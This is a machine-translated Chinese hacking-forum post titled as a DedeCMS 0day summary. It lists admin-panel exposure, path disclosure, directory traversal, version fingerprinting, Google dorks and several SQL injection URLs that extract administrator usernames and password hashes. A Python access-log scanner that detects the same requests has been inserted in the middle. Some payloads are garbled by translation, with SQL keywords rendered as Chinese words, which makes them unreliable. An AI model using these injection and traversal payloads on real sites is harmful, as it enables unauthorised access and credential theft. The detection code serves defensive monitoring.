1. include/dialog/select_soft.php exposes the DedeCMS admin backend. Older versions let you skip the login check and open it directly, with no administrator account needed; newer versions simply redirect to the backend.
2. include/dialog/config.php discloses the admin backend path.
3. include/dialog/select_soft.php?activepath=/include/FCKeditor lets you browse into that directory.
4. include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p discloses the site's absolute path.
5. Some older DedeCMS versions skip the login check entirely when this page is opened and display it directly, and /././././././././ can be used to climb up to the root directory. The access address is slightly different in those versions, though.
The address is require/dialog/select_soft.php?activepath=/././././././././
The other files under include\dialog\ have the same problem; only the default directory differs. Some of them let you view HTML files, too.
Files with the same problem:
include\dialog\select_images.php
include\dialog\select_media.php
include\dialog\select_templets.php
Finding the version: /data/admin/ver.txt
/data/mysql_error_trace.inc
/data/mysqli_error_trace.inc
Google dorks:
inurl:?dopost=showad
site:www.xxx.com inurl:login.php?gotopage=
Path disclosure:
/plus/carbuyaction.php?dopost=return&code=bank
/plus/carbuyaction.php?dopost=return&code=cod
/Include/payment/alipay.php
/Include/payment/yeepay.php
ver.txt date and the version it corresponds to:
20121030  5.7SP or 5.7
20120621  5.7SP1, 5.7 or 5.6
20120430  5.7SP, 5.7 or 5.6
20120709  5.6
20111205  5.7.18
20111111  v57, v56 or v55
20080307  v3, v4 or v5
20080324  v5 or later
20081218  5.1sp
20100803  5.6
20081009  v5.1sp
20080807  5.1 or 5.2
20101021  5.3
20090912  5.5
20121107  5.7
20111209  5.6
20090810  5.5
/ plugins
/plugins/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3, 4,5,6,7,8,9,10,用户ID,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,PWD,28来自+`%23 @__ admin`的29,30,31,32,33,34,35,36,37,38,39,40,41,42 +%23 @`\'`+] = a
/ plus / search .PHP?关键字= AS&typeArr [111%3D @'\'`)+联盟+选择+ 1,2,3,4,5,6,7,8,9,10,用户ID,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,PWD,28,29,30,31,32,33,34,35,36,37,38,39,40 ,41,42 + from +`%23 @__ admin`%23 @`\'`+] = a
/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+ FROM +(选择+ COUNT(*),的concat(地板(兰特(0)* 2),(子串((从+'%23 @__ admin` +极限+ 0选择+ CONCAT(0x7c,用户ID,0x7c,PWD)+, 1),1,62)))a + from + information_schema.tables + group + by + a)b)%23 @`\'`+] = a
/plus/recommend.php?aid=1&_FILES [type] [名称]&_ FILES [type] [size]&_ FILES
[type] [type]&_ FILES [type] [tmp_name] = aa \'和+ char(@`'`)+ / *!50000Un
ion * / + / *!50000SeLect * / + 1,2,3,共 ncat(0x3C6162633E,group_conc
在(0x7C,userid,0x3a,pwd,0x7C),0x3C2F6162633E),5,6,7,8,9%20从%20`%23 @__ admin`%23
------- ------------------------------------
Submit /plus/search.php?keyword=as&typeArr [uNion] = a
Look at the result; if it shows
安全提示:请求错误步骤2!
then use the following exp directly
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1, 2,3,4,5,6,7,8,9,10,用户ID,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, PWD,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 +从+`%23 @__ admin`%23 @'\'`+] =一
If the result shows
安全提示:请求错误步骤1!
then use the following exp directly
xx.com/plus/search.php?keyword=as&typeArr [111%3D @`\'`)+和+(SELECT + 1 + FROM +选择+ COUNT(*),的concat(地板(兰特(0)* 2),(子串((选择+ CONCAT(0x7c,用户ID,0x7c,PWD)+从+'%23 @__ admin` +极限+ 0,1) ,1,62)))a + from + information_schema.tables + group + by + a)b)%23 @`\'`+] = a
___________________
Member injection
DedeCMS 5.7 injection
2012.05.12
① Injection vulnerability.
First open the "/data/admin/ver.txt" page to get the date of the system's last upgrade,
then open the "/member/ajax_membergroup.php?action=post&membergroup=1" page
and append the statement there.
View the administrator account:
/member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23 @__ admin`%20where%201%20or%20id = @`'`
View the administrator password:
/部件/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@
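Added defender-side example (not from the original post): a small access-log scanner that flags the request shapes listed above, namely the typeArr[] injection in /plus/search.php, the non-numeric membergroup in /member/ajax_membergroup.php, activepath traversal in include/dialog/select_*.php, and the bare carbuyaction.php return that leaks the path. It assumes combined-format web access logs; the rule names, the sample log lines and their IP addresses are constructed.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Combined-format access log line; only the fields the rules need are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def bad_typearr(query):
    """typeArr[] keys are numeric type IDs; any other key (e.g. typeArr[uNion]) is tampering."""
    keys = re.findall(r"typeArr\[([^\]]*)\]", query, re.I)
    return any(k != "" and not k.isdigit() for k in keys)

RULES = [  # (rule name, request path prefix, predicate over the percent-decoded query)
    ("dedecms_search_typearr_sqli", "/plus/search.php", bad_typearr),
    # membergroup is a group ID; anything but digits is an injection attempt
    ("dedecms_membergroup_sqli", "/member/ajax_membergroup.php",
     lambda q: "membergroup=" in q and not re.search(r"membergroup=\d*(&|$)", q)),
    # activepath climbing with ../ or the /./ chain the page shows
    ("dedecms_dialog_traversal", "/include/dialog/select_",
     lambda q: re.search(r"activepath=[^&]*(\.\./|/\./)", q) is not None),
    # a bare payment return with no transaction fields exists only to trigger the error
    ("dedecms_carbuyaction_pathleak", "/plus/carbuyaction.php",
     lambda q: q in ("dopost=return&code=bank", "dopost=return&code=cod")),
]

def classify_request(target):
    """Return the rule name tripped by a request target (path + query), or None."""
    parts = urlsplit(target)
    query = unquote_plus(parts.query)  # decode %xx and '+' so obfuscated keywords are visible
    for name, prefix, predicate in RULES:
        if parts.path.lower().startswith(prefix) and predicate(query):
            return name
    return None

def scan_access_log(text):
    """Return (client ip, status, rule) for every request that trips a rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        rule = classify_request(m["target"]) if m else None
        if rule:
            hits.append((m["ip"], int(m["status"]), rule))
    return hits

# Constructed sample log (documentation IP ranges): four probes and one benign request.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Jun/2017:05:34:24 +0800] "GET /plus/search.php?keyword=as&typeArr[uNion]=a HTTP/1.1" 200 512
198.51.100.7 - - [20/Jun/2017:05:35:01 +0800] "GET /member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid HTTP/1.1" 200 300
198.51.100.7 - - [20/Jun/2017:05:35:09 +0800] "GET /include/dialog/select_soft.php?activepath=/././././ HTTP/1.1" 200 4100
192.0.2.9 - - [20/Jun/2017:05:36:00 +0800] "GET /member/ajax_membergroup.php?action=post&membergroup=1 HTTP/1.1" 302 0
192.0.2.9 - - [20/Jun/2017:05:36:02 +0800] "GET /plus/carbuyaction.php?dopost=return&code=bank HTTP/1.1" 200 700
"""
```

For select_soft.php hits, a 200 response instead of a redirect to the login page is the "older version skips the login check" case described above, so treat it as a confirmed exposure rather than a mere probe.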
Title: DeDeCMS 0day injection vulnerability summary
Author: 白蚂蚁
Source: 蚁安黑客官网
Please credit this link when reposting: http://www.mayidui.net/t623-1.html
2017-06-20 05:34:24
This probably doesn't work anymore; the version looks a bit old.